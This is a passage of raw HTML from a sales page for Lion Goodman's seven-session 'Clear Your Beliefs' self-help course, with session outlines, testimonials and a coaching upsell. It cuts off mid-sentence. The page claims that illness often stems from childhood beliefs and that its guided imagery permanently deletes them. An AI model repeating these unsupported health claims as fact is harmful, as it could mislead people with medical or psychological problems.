src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart 